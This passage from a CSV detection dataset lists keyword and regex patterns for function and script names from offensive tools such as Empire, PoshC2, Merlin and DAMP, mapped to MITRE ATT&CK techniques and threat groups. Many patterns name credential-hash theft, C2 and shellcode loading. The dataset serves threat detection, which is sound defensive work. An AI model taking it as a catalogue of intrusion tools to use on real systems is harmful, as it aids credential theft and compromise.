(if any)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","46205" "*Get-RemoteCachedCredential*",".{0,1000}Get\-RemoteCachedCredential.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - 
T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","46206" "*Get-RemoteCachedCredential*",".{0,1000}Get\-RemoteCachedCredential.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","46207" "*Get-RemoteDesktopUserSessionList*",".{0,1000}Get\-RemoteDesktopUserSessionList.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","46208" "*Get-RemoteDesktopUserSessionList.*",".{0,1000}Get\-RemoteDesktopUserSessionList\..{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","46209" "*Get-RemoteLocalAccountHash*",".{0,1000}Get\-RemoteLocalAccountHash.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Get local account hashes","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","46210" "*Get-RemoteLocalAccountHash*",".{0,1000}Get\-RemoteLocalAccountHash.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor 
Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","46211" "*Get-RemoteLocalAccountHash*",".{0,1000}Get\-RemoteLocalAccountHash.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","46212" "*Get-RemoteLocalAccountHash.json*",".{0,1000}Get\-RemoteLocalAccountHash\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","46213" "*Get-RemoteMachineAccountHash*",".{0,1000}Get\-RemoteMachineAccountHash.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Get machine account hash for silver ticket attack","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","46214" "*Get-RemoteMachineAccountHash*",".{0,1000}Get\-RemoteMachineAccountHash.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","46215" 
"*Get-RemoteMachineAccountHash.json*",".{0,1000}Get\-RemoteMachineAccountHash\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","46216" "*getremoteprocesslisting*",".{0,1000}getremoteprocesslisting.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46217" "*Get-RickAstley*",".{0,1000}Get\-RickAstley.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-RickAstley.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46218" "*Get-RickAstley.ps1*",".{0,1000}Get\-RickAstley\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46219" "*Get-RubeusForgeryArgs*",".{0,1000}Get\-RubeusForgeryArgs.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 
- T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46220" "*gets4uticket.py*",".{0,1000}gets4uticket\.py.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","46221" "*Get-SccmCacheFolder*",".{0,1000}Get\-SccmCacheFolder.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","46222" "*Get-ScheduledTaskComHandler.json*",".{0,1000}Get\-ScheduledTaskComHandler\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 
- TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","46223" "*get-screenshot*",".{0,1000}get\-screenshot.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46224" "*Get-Screenshot.ps1*",".{0,1000}Get\-Screenshot\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - 
TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46225" "*Get-Screenshot.ps1*",".{0,1000}Get\-Screenshot\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","46226" "*get-screenshotallwindows*",".{0,1000}get\-screenshotallwindows.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46227" "*Get-SecurityPackages.ps1*",".{0,1000}Get\-SecurityPackages\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-Vnc.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46228" "*Get-ServiceUnquoted*",".{0,1000}Get\-ServiceUnquoted.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46229" "*Get-ShadowCopies*",".{0,1000}Get\-ShadowCopies.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","46230" "*Get-SharePointSiteURLs*",".{0,1000}Get\-SharePointSiteURLs.{0,1000}","offensive_tool_keyword","GraphRunner","A 
Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Gets a list of SharePoint site URLs visible to the current user","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46231" "*Get-SharpChromium*",".{0,1000}Get\-SharpChromium.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46232" 
"*Get-SharpChromium.ps1*",".{0,1000}Get\-SharpChromium\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46233" "*GetShellcode(*",".{0,1000}GetShellcode\(.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. 
The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","46234" "*Get-SitelistFields*",".{0,1000}Get\-SitelistFields.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SiteListPassword.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46235" "*Get-SiteListPassword*",".{0,1000}Get\-SiteListPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
